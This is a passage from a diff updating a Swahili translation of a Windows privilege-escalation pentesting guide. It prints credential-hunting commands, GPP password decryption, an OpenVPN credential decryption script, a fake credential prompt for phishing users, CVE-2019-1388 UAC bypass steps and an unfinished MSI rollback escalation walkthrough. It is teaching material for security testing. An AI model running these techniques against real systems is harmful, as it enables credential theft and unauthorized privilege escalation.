reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys' ``` -Ikiwa utapata ingizo lolote ndani ya njia hiyo, huenda ikawa ni funguo za SSH zilizohifadhiwa. Inahifadhiwa kwa njia ya usimbaji lakini inaweza kufichuliwa kwa urahisi kwa kutumia [https://github.com/ropnop/windows_sshagent_extract](https://github.com/ropnop/windows_sshagent_extract).\ +Ikiwa utapata kipengee chochote ndani ya njia hiyo, uwezekano mkubwa ni SSH key iliyohifadhiwa. Imehifadhiwa kwa usimbuaji lakini inaweza kufichuliwa kwa urahisi kwa kutumia [https://github.com/ropnop/windows_sshagent_extract](https://github.com/ropnop/windows_sshagent_extract).\ Taarifa zaidi kuhusu mbinu hii hapa: [https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/) -Ikiwa huduma ya `ssh-agent` haiko inayoendesha na unataka ianze kiotomatiki wakati wa kuanzisha, endesha: +Ikiwa `ssh-agent` service haifanyi kazi na unataka ianze moja kwa moja wakati wa boot endesha: ```bash Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service ``` > [!TIP] -> Inaonekana kwamba mbinu hii si halali tena. Nilijaribu kuunda funguo za ssh, kuziongeza na `ssh-add` na kuingia kupitia ssh kwenye mashine. Usajili HKCU\Software\OpenSSH\Agent\Keys haupo na procmon haikugundua matumizi ya `dpapi.dll` wakati wa uthibitishaji wa funguo zisizo sawa. +> Inaonekana mbinu hii haifanyi kazi tena. Nilijaribu kuunda baadhi ya ssh keys, kuziongeza kwa `ssh-add` na kuingia kwa ssh kwenye mashine. Registry HKCU\Software\OpenSSH\Agent\Keys haipo na procmon hakutambua matumizi ya `dpapi.dll` wakati wa uthibitisho wa funguo asimetriki. -### Faili zisizo na mtu +### Faili zilizoachwa bila uangalizi ``` C:\Windows\sysprep\sysprep.xml C:\Windows\sysprep\sysprep.inf @@ -953,7 +964,9 @@ C:\unattend.txt C:\unattend.inf dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul ``` -Unaweza pia kutafuta faili hizi ukitumia **metasploit**: _post/windows/gather/enum_unattend_ +Unaweza pia kutafuta faili hizi kwa kutumia **metasploit**: _post/windows/gather/enum_unattend_ + +Mfano wa yaliyomo: ```xml @@ -972,7 +985,7 @@ Unaweza pia kutafuta faili hizi ukitumia **metasploit**: _post/windows/gather/en ``` -### SAM & SYSTEM backups +### SAM & SYSTEM nakala za chelezo ```bash # Usually %SYSTEMROOT% = C:\Windows %SYSTEMROOT%\repair\SAM @@ -982,7 +995,7 @@ Unaweza pia kutafuta faili hizi ukitumia **metasploit**: _post/windows/gather/en %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system ``` -### Hati za Wingu +### Vyeti vya Wingu ```bash #From user home .aws\credentials @@ -994,15 +1007,15 @@ AppData\Roaming\gcloud\access_tokens.db ``` ### McAfee SiteList.xml -Tafuta faili inayoitwa **SiteList.xml** +Tafuta faili iitwayo **SiteList.xml** -### Cached GPP Pasword +### Nywila ya GPP iliyohifadhiwa -Kipengele kilikuwa na uwezo wa awali ambacho kiliruhusu usambazaji wa akaunti za wasimamizi wa ndani za kawaida kwenye kundi la mashine kupitia Mipangilio ya Sera ya Kundi (GPP). Hata hivyo, njia hii ilikuwa na kasoro kubwa za usalama. Kwanza, Vitu vya Sera ya Kundi (GPOs), vilivyohifadhiwa kama faili za XML katika SYSVOL, vinaweza kufikiwa na mtumiaji yeyote wa kikoa. Pili, nywila ndani ya GPP hizi, zilizofichwa kwa AES256 kwa kutumia funguo za kawaida zilizoorodheshwa hadharani, zinaweza kufichuliwa na mtumiaji yeyote aliyeidhinishwa. Hii ilileta hatari kubwa, kwani inaweza kuruhusu watumiaji kupata haki za juu. +Kipengele kilikuwepo hapo awali kilichoruhusu usambazaji wa akaunti maalum za local administrator kwenye kundi la mashine kupitia Group Policy Preferences (GPP). Hata hivyo, njia hii ilikuwa na mapungufu makubwa ya usalama. Kwanza, Group Policy Objects (GPOs), zilizohifadhiwa kama faili za XML katika SYSVOL, zinaweza kupatikana na mtumiaji yeyote wa domain. Pili, password ndani ya GPP hizi, zilizofichwa kwa AES256 kwa kutumia default key iliyotangazwa hadharani, zinaweza kufifuliwa na mtumiaji yeyote aliyethibitishwa. Hii ilisababisha hatari kubwa, kwani inaweza kumruhusu mtumiaji kupata privileges za juu. -Ili kupunguza hatari hii, kazi ilitengenezwa kutafuta faili za GPP zilizohifadhiwa kwa ndani zenye uwanja wa "cpassword" ambao si tupu. Punde tu inapo pata faili kama hiyo, kazi hiyo inafichua nywila na inarudisha kitu maalum cha PowerShell. Kitu hiki kinajumuisha maelezo kuhusu GPP na mahali ambapo faili hiyo iko, kusaidia katika kutambua na kurekebisha udhaifu huu wa usalama. +Ili kupunguza hatari hii, ilitengenezwa function ambayo inachambua faili za GPP zilizohifadhiwa lokal zinazojumuisha field ya "cpassword" ambayo si tupu. Ikikuta faili kama hiyo, function inadecrypt password na kurudisha custom PowerShell object. Object hii inajumuisha maelezo kuhusu GPP na eneo la faili, ikisaidia katika utambuzi na kurekebisha udhaifu huu wa usalama. -Tafuta katika `C:\ProgramData\Microsoft\Group Policy\history` au katika _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (kabla ya W Vista)_ kwa ajili ya faili hizi: +Tafuta katika `C:\ProgramData\Microsoft\Group Policy\history` au katika _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (previous to W Vista)_ kwa faili hizi: - Groups.xml - Services.xml @@ -1011,12 +1024,12 @@ Tafuta katika `C:\ProgramData\Microsoft\Group Policy\history` au katika _**C:\Do - Printers.xml - Drives.xml -**Ili kufichua cPassword:** +**Ili ku-decrypt cPassword:** ```bash #To decrypt these passwords you can decrypt it using gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw ``` -Kutumia crackmapexec kupata nywila: +Kutumia crackmapexec kupata passwords: ```bash crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin ``` @@ -1034,7 +1047,7 @@ C:\inetpub\wwwroot\web.config Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue ``` -Mfano wa web.config wenye akidi: +Mfano wa web.config yenye credentials: ```xml @@ -1044,7 +1057,7 @@ Mfano wa web.config wenye akidi: ``` -### Akiba za OpenVPN +### OpenVPN nyaraka za kuingia ```csharp Add-Type -AssemblyName System.Security $keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs" @@ -1064,7 +1077,7 @@ $entropy, Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes)) } ``` -### Magogo +### Magazeti ```bash # IIS C:\inetpub\logs\LogFiles\* @@ -1072,9 +1085,9 @@ C:\inetpub\logs\LogFiles\* #Apache Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue ``` -### Uliza kwa ajili ya akidi +### Omba credentials -Unaweza kila wakati **kumwomba mtumiaji aingize akidi zake au hata akidi za mtumiaji mwingine** ikiwa unafikiri anaweza kujua hizo (zingatia kwamba **kuuliza** mteja moja kwa moja kwa ajili ya **akidi** ni hatari sana): +Unaweza kila wakati **kumwomba mtumiaji aingize credentials zake au hata credentials za mtumiaji mwingine** ikiwa unadhani anaweza kuyajua (kumbuka kwamba **kuuliza** mteja moja kwa moja kwa **credentials** ni kweli **hatari**): ```bash $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password @@ -1082,9 +1095,9 @@ $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::U #Get plaintext $cred.GetNetworkCredential() | fl ``` -### **Majina ya faili yanayoweza kuwa na akidi** +### **Majina ya faili yanayoweza kuwa na credentials** -Faili zinazojulikana ambazo zamani zilikuwa na **nywila** katika **maandishi wazi** au **Base64** +Faili zilizojulikana ambazo zamani zilikuwa na **passwords** kwa **clear-text** au **Base64** ```bash $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history vnc.ini, ultravnc.ini, *vnc* @@ -1159,80 +1172,80 @@ Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAct ``` ### Credentials in the RecycleBin -Unapaswa pia kuangalia Bin kutafuta akiba ndani yake +Pia unapaswa kuangalia Bin kutafuta vielelezo vya kuingia ndani yake -Ili **kurejesha nywila** zilizohifadhiwa na programu kadhaa unaweza kutumia: [http://www.nirsoft.net/password_recovery_tools.html](http://www.nirsoft.net/password_recovery_tools.html) +To **kupata tena nywila** zilizohifadhiwa na programu kadhaa unaweza kutumia: [http://www.nirsoft.net/password_recovery_tools.html](http://www.nirsoft.net/password_recovery_tools.html) -### Inside the registry +### Ndani ya rejista -**Funguo zingine zinazowezekana za registry zenye akiba** +**Vifunguo vingine vya rejista vinavyoweza kuwa na vielelezo vya kuingia** ```bash reg query "HKCU\Software\ORL\WinVNC3\Password" reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s reg query "HKCU\Software\TightVNC\Server" reg query "HKCU\Software\OpenSSH\Agent\Key" ``` -[**Toa funguo za openssh kutoka kwa rejista.**](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/) +[**Extract openssh keys from registry.**](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/) -### Historia ya Vivinjari +### Historia ya vivinjari -Unapaswa kuangalia kwa dbs ambapo nywila kutoka **Chrome au Firefox** zimehifadhiwa.\ -Pia angalia historia, alama na vipendwa vya vivinjari ili labda baadhi ya **nywila zimehifadhiwa** huko. +Unapaswa kuangalia dbs ambapo nywila za **Chrome au Firefox** zinahifadhiwa.\ +Pia angalia historia, bookmarks na favourites za vivinjari, kwani huenda baadhi ya **nywila zimehifadhiwa** huko. -Zana za kutoa nywila kutoka kwa vivinjari: +Tools to extract passwords from browsers: - Mimikatz: `dpapi::chrome` - [**SharpWeb**](https://github.com/djhohnstein/SharpWeb) - [**SharpChromium**](https://github.com/djhohnstein/SharpChromium) - [**SharpDPAPI**](https://github.com/GhostPack/SharpDPAPI) -### **Kuandika Upya COM DLL** +### **COM DLL Overwriting** -**Component Object Model (COM)** ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows inayoruhusu **mawasiliano** kati ya vipengele vya programu za lugha tofauti. Kila kipengele cha COM kinatambuliwa kupitia kitambulisho cha darasa (CLSID) na kila kipengele kinatoa kazi kupitia moja au zaidi ya interfaces, zinazotambuliwa kupitia kitambulisho cha interface (IIDs). +Component Object Model (COM) ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows inayoruhusu mawasiliano kati ya vipengele vya programu vilivyoandikwa kwa lugha tofauti. Kila sehemu ya COM inatambulishwa kwa class ID (CLSID) na kila sehemu huonyesha utendakazi kupitia interface moja au zaidi, zinazotambulishwa kwa interface IDs (IIDs). -Darasa na interfaces za COM zinafafanuliwa katika rejista chini ya **HKEY\CLASSES\ROOT\CLSID** na **HKEY\CLASSES\ROOT\Interface** mtawalia. Rejista hii inaundwa kwa kuunganisha **HKEY\LOCAL\MACHINE\Software\Classes** + **HKEY\CURRENT\USER\Software\Classes** = **HKEY\CLASSES\ROOT.** +COM classes and interfaces are defined in the registry under **HKEY\CLASSES\ROOT\CLSID** and **HKEY\CLASSES\ROOT\Interface** respectively. This registry is created by merging the **HKEY\LOCAL\MACHINE\Software\Classes** + **HKEY\CURRENT\USER\Software\Classes** = **HKEY\CLASSES\ROOT.** -Ndani ya CLSIDs za rejista hii unaweza kupata rejista ya mtoto **InProcServer32** ambayo ina **thamani ya kawaida** inayoelekeza kwenye **DLL** na thamani inayoitwa **ThreadingModel** ambayo inaweza kuwa **Apartment** (Single-Threaded), **Free** (Multi-Threaded), **Both** (Single au Multi) au **Neutral** (Thread Neutral). +Inside the CLSIDs of this registry you can find the child registry **InProcServer32** which contains a **default value** pointing to a **DLL** and a value called **ThreadingModel** that can be **Apartment** (Single-Threaded), **Free** (Multi-Threaded), **Both** (Single or Multi) or **Neutral** (Thread Neutral). ![](<../../images/image (729).png>) -Kimsingi, ikiwa unaweza **kuandika upya yoyote ya DLLs** ambazo zitatekelezwa, unaweza **kuinua mamlaka** ikiwa hiyo DLL itatekelezwa na mtumiaji tofauti. +Kwa kifupi, ikiwa unaweza kuandika juu (overwrite) DLL yoyote itakayotekelezwa, unaweza escalate privileges ikiwa DLL hiyo itatekelezwa na mtumiaji mwingine. -Ili kujifunza jinsi washambuliaji wanavyotumia COM Hijacking kama njia ya kudumu angalia: +Ili kujifunza jinsi wadukuzi wanavyotumia COM Hijacking kama mekanisimu ya persistence angalia: {{#ref}} com-hijacking.md {{#endref}} -### **Utafutaji wa Nywila za Kijenerali katika Faili na Rejista** +### **Utafutaji wa nywila kwa ujumla katika faili na registry** -**Tafuta maudhui ya faili** +**Tafuta yaliyomo katika faili** ```bash cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt findstr /si password *.xml *.ini *.txt *.config findstr /spin "password" *.* ``` -**Tafuta faili yenye jina fulani** +**Tafuta faili lenye jina fulani** ```bash dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* where /R C:\ user.txt where /R C:\ *.ini ``` -**Tafuta kwenye rejista kwa majina ya funguo na nywila** +**Tafuta registry kwa key names na passwords** ```bash REG QUERY HKLM /F "password" /t REG_SZ /S /K REG QUERY HKCU /F "password" /t REG_SZ /S /K REG QUERY HKLM /F "password" /t REG_SZ /S /d REG QUERY HKCU /F "password" /t REG_SZ /S /d ``` -### Zana za kutafuta nywila +### Zana zinazotafuta passwords -[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **ni plugin ya msf** niliyoitengeneza plugin hii ili **kutekeleza kiotomati kila moduli ya POST ya metasploit inayotafuta nywila** ndani ya mwathirika.\ -[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) inatafuta kiotomati faili zote zinazokuwa na nywila zilizotajwa katika ukurasa huu.\ -[**Lazagne**](https://github.com/AlessandroZ/LaZagne) ni zana nyingine nzuri ya kutoa nywila kutoka kwa mfumo. +[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **ni plugin ya msf** niliyetengeneza; plugin hii **inatekeleza kwa otomatiki kila metasploit POST module inayotafuta credentials** ndani ya mwathiriwa.\ +[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) inatafuta moja kwa moja faili zote zenye passwords zilizotajwa katika ukurasa huu.\ +[**Lazagne**](https://github.com/AlessandroZ/LaZagne) ni zana nyingine nzuri ya kutoa password kutoka kwa mfumo. -Zana [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) inatafuta **sessions**, **majina ya watumiaji** na **nywila** za zana kadhaa zinazohifadhi data hii kwa maandiko wazi (PuTTY, WinSCP, FileZilla, SuperPuTTY, na RDP) +Zana [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) inatafuta **sessions**, **usernames** na **passwords** za zana kadhaa zinazohifadhi data hii kwa maandishi wazi (PuTTY, WinSCP, FileZilla, SuperPuTTY, na RDP) ```bash Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -Thorough @@ -1241,30 +1254,30 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss ``` ## Leaked Handlers -Fikiria kwamba **mchakato unaotembea kama SYSTEM unafungua mchakato mpya** (`OpenProcess()`) kwa **ufikiaji kamili**. Mchakato huo huo **pia unaunda mchakato mpya** (`CreateProcess()`) **kwa ruhusa za chini lakini ukirithi handles zote za wazi za mchakato mkuu**.\ -Kisha, ikiwa una **ufikiaji kamili kwa mchakato wa chini wa ruhusa**, unaweza kuchukua **handle wazi kwa mchakato wa ruhusa ulioanzishwa** na `OpenProcess()` na **kuingiza shellcode**.\ +Fikiria kuwa **mchakato unaoendesha kama SYSTEM unafungua mchakato mpya** (`OpenProcess()`) kwa **upatikanaji kamili**. Mchakato huo huo **pia hutengeneza mchakato mpya** (`CreateProcess()`) **enye ruhusa za chini lakini inayoirithi handles zote zilizofunguliwa za mchakato mkuu**.\ +Kisha, ikiwa una **upatikanaji kamili kwa mchakato wa ruhusa ndogo**, unaweza kuchukua **open handle ya mchakato mwenye ruhusa iliyoanzishwa** kwa `OpenProcess()` na **kuingiza shellcode**.\ [Read this example for more information about **how to detect and exploit this vulnerability**.](leaked-handle-exploitation.md)\ [Read this **other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access)**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/). ## Named Pipe Client Impersonation -Sehemu za kumbukumbu zilizoshirikiwa, zinazoitwa **pipes**, zinawezesha mawasiliano ya mchakato na uhamasishaji wa data. +Sehemu za kumbukumbu zilizoshirikiwa, zinazojulikana kama **pipes**, zinawezesha mawasiliano ya michakato na uhamishaji wa data. -Windows inatoa kipengele kinachoitwa **Named Pipes**, kinachoruhusu michakato isiyo na uhusiano kushiriki data, hata kupitia mitandao tofauti. Hii inafanana na usanifu wa mteja/server, ambapo majukumu yanafafanuliwa kama **named pipe server** na **named pipe client**. +Windows inatoa kipengele kinachoitwa **Named Pipes**, kinachomruhusu michakato isiyohusiana kushiriki data, hata juu ya mitandao tofauti. Hii inafanana na usanifu wa client/server, ambapo majukumu yanatafsiriwa kama **named pipe server** na **named pipe client**. -Wakati data inatumwa kupitia pipe na **mteja**, **server** iliyoweka pipe ina uwezo wa **kuchukua utambulisho** wa **mteja**, ikiwa ina haki zinazohitajika za **SeImpersonate**. Kutambua **mchakato wa ruhusa** unaowasiliana kupitia pipe unayoweza kuiga kunatoa fursa ya **kupata ruhusa za juu** kwa kukubali utambulisho wa mchakato huo mara tu unapoingiliana na pipe uliyounda. Kwa maelekezo ya kutekeleza shambulio kama hilo, mwongozo wa kusaidia unaweza kupatikana [**here**](named-pipe-client-impersonation.md) na [**here**](#from-high-integrity-to-system). +Wakati data inapotumwa kupitia pipe na **client**, **server** aliyeweka pipe ana uwezo wa **kuiga utambulisho** wa **client**, iwapo ana haki zinazohitajika za **SeImpersonate**. Kuibua mchakato wenye ruhusa unaowasiliana kupitia pipe unaweza kuiga kunatoa fursa ya **kupata ruhusa za juu** kwa kuchukua utambulisho wa mchakato huo mara tu unaposhirikiana na pipe uliyoiweka. Kwa maagizo ya jinsi ya kutekeleza shambulio kama hilo, mwongozo muhimu unaweza kupatikana [**hapa**](named-pipe-client-impersonation.md) na [**hapa**](#from-high-integrity-to-system). -Pia zana ifuatayo inaruhusu **kukamata mawasiliano ya named pipe kwa zana kama burp:** [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **na zana hii inaruhusu kuorodhesha na kuona pipes zote ili kupata privescs** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer) +Vilevile zana ifuatayo inaruhusu **kuingilia mawasiliano ya named pipe kwa zana kama burp:** [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **na zana hii inaruhusu kuorodhesha na kuona pipes zote ili kupata privescs** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer) -## Misc +## Mengine -### File Extensions that could execute stuff in Windows +### Extensions za faili zinazoweza kutekeleza vitu katika Windows -Check out the page **[https://filesec.io/](https://filesec.io/)** +Angalia ukurasa **[https://filesec.io/](https://filesec.io/)** -### **Monitoring Command Lines for passwords** +### **Kufuatilia Mistari ya Amri kwa nywila** -Wakati unapata shell kama mtumiaji, kunaweza kuwa na kazi zilizopangwa au michakato mingine inayotekelezwa ambayo **inasafirisha akidi kwenye mstari wa amri**. Skripti iliyo hapa chini inakamata mistari ya amri za mchakato kila sekunde mbili na kulinganisha hali ya sasa na hali ya awali, ikitoa tofauti zozote. +Unapopata shell kama mtumiaji, kunaweza kuwa na scheduled tasks au michakato mingine inayotekelezwa ambayo **huweka nywila kwenye command line**. Script chini inakamata command lines za michakato kila sekunde mbili na inalinganisha hali ya sasa na ile ya awali, ikitoa tofauti zozote. ```bash while($true) { @@ -1276,13 +1289,13 @@ Compare-Object -ReferenceObject $process -DifferenceObject $process2 ``` ## Kuiba nywila kutoka kwa michakato -## Kutoka kwa Mtumiaji wa Haki za Chini hadi NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass +## Kutoka kwa mtumiaji mwenye vibali vya chini hadi NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass -Ikiwa una ufikiaji wa kiolesura cha grafiki (kupitia console au RDP) na UAC imewezeshwa, katika toleo zingine za Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama "NT\AUTHORITY SYSTEM" kutoka kwa mtumiaji asiye na haki. +Ikiwa una ufikiaji wa kiolesura cha picha (via console au RDP) na UAC imewezeshwa, katika baadhi ya matoleo ya Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama "NT\AUTHORITY SYSTEM" kutoka kwa mtumiaji asiye na vibali. -Hii inafanya iwezekane kupandisha haki na kupita UAC kwa wakati mmoja kwa kutumia udhaifu huo huo. Zaidi ya hayo, hakuna haja ya kufunga chochote na binary inayotumika wakati wa mchakato, imesainiwa na kutolewa na Microsoft. +Hii inafanya iwezekane kuongeza kiwango cha vibali na kupitisha UAC kwa wakati mmoja kwa udhaifu huo uleule. Zaidi ya hayo, hakuna haja ya kusakinisha chochote na binary inayotumika wakati wa mchakato huo imesainiwa na kutolewa na Microsoft. -Baadhi ya mifumo iliyoathiriwa ni ifuatayo: +Baadhi ya mifumo iliyoathirika ni zifuatazo: ``` SERVER ====== @@ -1304,7 +1317,7 @@ Windows 10 1607 14393 ** link OPENED AS SYSTEM ** Windows 10 1703 15063 link NOT opened Windows 10 1709 16299 link NOT opened ``` -Ili kutumia udhaifu huu, ni lazima ufanye hatua zifuatazo: +Ili ku-exploit udhaifu huu, ni lazima ufanye hatua zifuatazo: ``` 1) Right click on the HHUPD.EXE file and run it as Administrator. @@ -1326,9 +1339,9 @@ You have all the necessary files and information in the following GitHub reposit https://github.com/jas502n/CVE-2019-1388 -## Kutoka kwa Administrator Medium hadi High Integrity Level / UAC Bypass +## Kutoka Administrator Medium hadi High Integrity Level / UAC Bypass -Soma hii ili **ujifunze kuhusu Viwango vya Uaminifu**: +Soma hii ili **ujifunze kuhusu Viwango vya Uadilifu**: {{#ref}} @@ -1342,128 +1355,128 @@ Kisha **soma hii ili ujifunze kuhusu UAC na UAC bypasses:** ../authentication-credentials-uac-and-efs/uac-user-account-control.md {{#endref}} -## Kutoka kwa Kuondoa/Kuhamasisha/Kubadilisha Folda ya Kichaguliwa hadi SYSTEM EoP +## Kutoka Arbitrary Folder Delete/Move/Rename hadi SYSTEM EoP -Tekniki iliyoelezwa [**katika chapisho hili la blog**](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) na msimbo wa exploit [**upatikane hapa**](https://github.com/thezdi/PoC/tree/main/FilesystemEoPs). +Mbinu iliyoelezewa [**in this blog post**](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) pamoja na code ya exploit [**available here**](https://github.com/thezdi/PoC/tree/main/FilesystemEoPs). -Shambulio hili kimsingi linajumuisha kutumia kipengele cha kurejesha cha Windows Installer ili kubadilisha faili halali na za uhalifu wakati wa mchakato wa kuondoa. Kwa hili, mshambuliaji anahitaji kuunda **msanidi wa MSI mbaya** ambayo itatumika kuingilia folda ya `C:\Config.Msi`, ambayo baadaye itatumika na Windows Installer kuhifadhi faili za kurejesha wakati wa kuondoa pakiti nyingine za MSI ambapo faili za kurejesha zingekuwa zimebadilishwa ili kuwa na mzigo mbaya. +Shambulio kwa ujumla linahusu kutumia vibaya kipengele cha rollback cha Windows Installer ili kubadilisha faili halali kuwa zile zenye madhara wakati wa prosesu ya uninstallation. Kwa hili mshambuliaji anahitaji kuunda **malicious MSI installer** ambayo itatumika ku-hijack folda ya `C:\Config.Msi`, ambayo baadaye Windows Installer itaitumia kuhifadhi faili za rollback wakati wa uninstallation ya vifurushi vingine vya MSI ambapo faili za rollback zingeweza kubadilishwa kubeba payload yenye madhara. -Tekniki iliyofupishwa ni ifuatayo: +Mbinu iliyofupishwa ni ifuatayo: -1. **Hatua ya 1 – Kujiandaa kwa Uingiliaji (acha `C:\Config.Msi` kuwa tupu)** +1. **Stage 1 – Kujiandaa kwa Hijack (acha `C:\Config.Msi` iwe tupu)** -- Hatua ya 1: Sakinisha MSI -- Unda `.msi` inayosakinisha faili isiyo na madhara (mfano, `dummy.txt`) katika folda inayoweza kuandikwa (`TARGETDIR`). -- Weka msanidi kama **"UAC Inayokubalika"**, ili **mtumiaji asiye admin** aweze kuikimbia. -- Hifadhi **handle** wazi kwa faili baada ya kusakinisha. +- Step 1: Install the MSI +- Tengeneza `.msi` ambayo inaweka faili isiyo na madhara (mfano, `dummy.txt`) katika folda inayoweza kuandikwa (`TARGETDIR`). +- Tambua installer kama **"UAC Compliant"**, ili **mtumiaji asiye admin** aweze kuendesha. +- Weka **handle** wazi kwa faili baada ya install. -- Hatua ya 2: Anza Kuondoa -- Ondoa ile ile `.msi`. -- Mchakato wa kuondoa unaanza kuhamasisha faili kwenda `C:\Config.Msi` na kuzipatia majina ya faili ya `.rbf` (backup za kurejesha). -- **Poll handle ya faili wazi** kwa kutumia `GetFinalPathNameByHandle` ili kugundua wakati faili inakuwa `C:\Config.Msi\.rbf`. +- Step 2: Begin Uninstall +- Uninstall `.msi` ile ile. +- Mchakato wa uninstall huanza kuhamisha faili kwenda `C:\Config.Msi` na kuyabadilisha jina kuwa faili `.rbf` (backup za rollback). +- **Kaga handle ya faili uliyo wazi** kwa kutumia `GetFinalPathNameByHandle` ili kugundua wakati faili inakuwa `C:\Config.Msi\.rbf`. -- Hatua ya 3: Usawazishaji wa Kawaida -- `.msi` inajumuisha **kitendo cha kuondoa cha kawaida (`SyncOnRbfWritten`)** ambacho: -- Kinatoa ishara wakati `.rbf` imeandikwa. -- Kisha **inasubiri** kwenye tukio lingine kabla ya kuendelea na kuondoa. +- Step 3: Custom Syncing +- `.msi` inajumuisha **custom uninstall action (`SyncOnRbfWritten`)** ambayo: +- Inaonyesha (signals) wakati `.rbf` imeandikwa. +- Kisha **inasubiri** tukio lingine kabla ya kuendelea na uninstall. -- Hatua ya 4: Zuia Kuondoa `.rbf` -- Wakati inatoa ishara, **fungua faili ya `.rbf`** bila `FILE_SHARE_DELETE` — hii **inazuia kuondolewa**. -- Kisha **toa ishara nyuma** ili kuondoa iweze kumalizika. -- Windows Installer inashindwa kuondoa `.rbf`, na kwa sababu haiwezi kuondoa maudhui yote, **`C:\Config.Msi` haiondolewa**. +- Step 4: Block Deletion of `.rbf` +- Ukitangazwa, **fungua faili `.rbf`** bila `FILE_SHARE_DELETE` — hili **linazuia kufutwa kwake**. +- Kisha **tuma ishara tena** ili uninstall iendelee. +- Windows Installer inashindwa kufuta `.rbf`, na kwa sababu hawezi kufuta yaliyomo yote, **`C:\Config.Msi` haifutwi**. -- Hatua ya 5: Ondoa `.rbf` kwa Mikono -- Wewe (mshambuliaji) unafuta faili ya `.rbf` kwa mikono. -- Sasa **`C:\Config.Msi` ni tupu**, tayari kuingiliwa. +- Step 5: Manually Delete `.rbf` +- Wewe (mshambuliaji) unafuta `.rbf` kwa mikono. +- Sasa **`C:\Config.Msi` iko tupu**, tayari ku-hijackiwa. -> Katika hatua hii, **sababisha udhaifu wa kuondoa folda ya kichaguliwa kwa kiwango cha SYSTEM** ili kufuta `C:\Config.Msi`. +> Wakati huu, **anzisha udhaifu wa kufuta folda kwa ngazi ya SYSTEM** ili kufuta `C:\Config.Msi`. -2. **Hatua ya 2 – Kubadilisha Skripti za Kurejesha na za Uhalifu** +2. **Stage 2 – Kubadilisha Rollback Scripts na Zenye Madhara** -- Hatua ya 6: Recreate `C:\Config.Msi` na ACL dhaifu -- Recreate folda ya `C:\Config.Msi` mwenyewe. -- Weka **DACL dhaifu** (mfano, Everyone:F), na **hifadhi handle wazi** na `WRITE_DAC`. +- Step 6: Recreate `C:\Config.Msi` with Weak ACLs +- Unda tena folda `C:\Config.Msi` mwenyewe. +- Weka **DACLs dhaifu** (mfano, Everyone:F), na **weka handle wazi** ukiwa na `WRITE_DAC`. -- Hatua ya 7: Kimbia Sakinisha Nyingine -- Sakinisha `.msi` tena, na: -- `TARGETDIR`: Mahali pa kuandika. -- `ERROROUT`: Kigezo kinachosababisha kushindwa kwa lazima. -- Sakinisho hili litatumika kusababisha **kurejesha** tena, ambayo inasoma `.rbs` na `.rbf`. +- Step 7: Run Another Install +- Install `.msi` tena, na: +- `TARGETDIR`: Mahali panapoandikwa. +- `ERROROUT`: Kigezo kinachosababisha kushindwa kwa kupata kosa. +- Install hii itatumika kusababisha **rollback** tena, ambayo inasoma `.rbs` na `.rbf`. -- Hatua ya 8: Fuata kwa `.rbs` -- Tumia `ReadDirectoryChangesW` kufuatilia `C:\Config.Msi` hadi `.rbs` mpya inatokea. -- Pata jina lake la faili. +- Step 8: Monitor for `.rbs` +- Tumia `ReadDirectoryChangesW` kufuatilia 